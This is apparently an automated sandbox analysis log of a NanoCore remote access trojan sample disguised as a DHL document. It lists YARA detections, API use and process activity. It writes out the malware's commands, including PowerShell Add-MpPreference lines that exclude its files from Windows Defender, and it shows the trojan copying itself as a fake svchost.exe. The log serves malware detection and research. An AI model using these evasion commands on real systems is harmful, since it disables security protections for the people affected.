          Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.CasPol.exe.2dfb8c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 29.2.CasPol.exe.5370000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.5370000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmpBinary or memory string: 0024000004800000940000000602000000240000525341310004000001000100B5FC90E7027F67871E773A8FDE8938C81DD402Bf:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: classification engineClassification label: mal100.troj.evad.winEXE@44/21@5/5
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 14_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210225Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{933bebd4-0378-4b22-a9fe-1200446be50c}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5308
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6400:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7dJump to behavior
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: DHL_document1102202068090891.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: DHL_document1102202068090891.exeVirustotal: Detection: 28%
          Source: DHL_document1102202068090891.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile read: C:\Users\user\Desktop\DHL_document1102202068090891.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL_document1102202068090891.exe 'C:\Users\user\Desktop\DHL_document1102202068090891.exe'
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864
          Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
          Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
          Source: unknownProcess created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
          Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
